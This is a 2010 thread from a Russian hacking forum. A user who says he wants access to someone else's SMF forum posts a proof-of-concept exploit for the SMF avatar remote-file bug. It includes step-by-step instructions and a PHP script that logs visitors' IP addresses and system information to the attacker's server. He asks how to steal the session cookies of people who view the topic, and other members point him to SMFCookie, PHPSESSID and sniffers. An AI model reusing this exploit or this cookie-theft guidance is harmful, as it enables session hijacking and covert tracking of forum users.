HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ОФФТОП > Болталка
Перезагрузить страницу Получить куки на SMF 1.1.18
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Получить куки на SMF 1.1.18
  #1  
Старый 20.04.2010, 19:34
br1tva
Познающий
Регистрация: 26.12.2007
Сообщений: 38
С нами: 9671107

Репутация: 8
По умолчанию Получить куки на SMF 1.1.18
Значит нужен доступ к одному форуму , версия форума 1.1.18 .
Нашел под форум exploit :

Simple Machines Forum <= 1.1.8 (avatar) Remote PHP File Execute PoC

- Step by Step:

1) go to your profile in section of avatar.
2) put the url of the malicious php file as avatar (ex: http://target/poc.php).
3) create a new topic.

- [victims] All the people that visit the topic will be infect.


malicious file example [steal info]: (poc.php)


PHP код:
<?php   $ip $_SERVER;   $so$_SERVER;   $lan$_SERVER;   $url$_SERVER;   $path$_SERVER;   $archivo 'hacks.txt';   $fp fopen($archivo"a");   $string "   Simple Machines Forum <= 1.1.8 (avatar) rpfe PoC       $path$url     VICTIM: $ip     info: $so   language: $lan       ";   $write fputs($fp$string);   fclose($fp);   ?>
Делаю все как указанно выше , на моем хосте в файл hacks.txt пишется Ип , Время , Дата и sysinfo . Возможно ли с помощью этого exploita тянуть куки зашедших в топик ???
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 20.04.2010, 19:49
br1tva
Познающий
Регистрация: 26.12.2007
Сообщений: 38
С нами: 9671107

Репутация: 8
По умолчанию
уп )) стил нид хелп .
 
Ответить с цитированием

  #3  
Старый 20.04.2010, 20:09
Godfather Bulan
Постоянный
Регистрация: 18.03.2008
Сообщений: 411
С нами: 9551846

Репутация: 2389
По умолчанию
ну так посмотри переменную PHPSESSID например или как там в SMF
 
Ответить с цитированием

  #4  
Старый 20.04.2010, 21:34
Chubakur
Познающий
Регистрация: 06.04.2009
Сообщений: 69
С нами: 8998764

Репутация: 39
По умолчанию
SMFCookie и PHPSESSID посмотри.
 
Ответить с цитированием

  #5  
Старый 20.04.2010, 21:38
br1tva
Познающий
Регистрация: 26.12.2007
Сообщений: 38
С нами: 9671107

Репутация: 8
По умолчанию
Вплане SMFCookie и PHPSESSID посмотри ?? Можно немного поподробней ?? Я с куками 1 раз дело имею !!
 
Ответить с цитированием

  #6  
Старый 21.04.2010, 01:08
br1tva
Познающий
Регистрация: 26.12.2007
Сообщений: 38
С нами: 9671107

Репутация: 8
По умолчанию
Народ , помогите нубику ))
 
Ответить с цитированием

  #7  
Старый 21.04.2010, 01:16
Godfather Bulan
Постоянный
Регистрация: 18.03.2008
Сообщений: 411
С нами: 9551846

Репутация: 2389
По умолчанию
ну посмотри в сторону снифаков
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Phpbb2 0.16 можно ли через куки получить доступ к админке? HAMANN Уязвимости CMS / форумов 3 20.11.2006 01:25
Как можно получить куки ? VARVAR Уязвимости Mail-сервис 9 07.06.2005 02:22
Возможно ли в phpBB(2.0.10) использовать xss и получить админские куки? virgoz Уязвимости CMS / форумов 2 02.01.2005 22:08
Нашел XSS в теге site. Какой запрос надо вставить, что бы получить куки юзеров? Sky Уязвимости CMS / форумов 3 04.11.2004 15:02



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.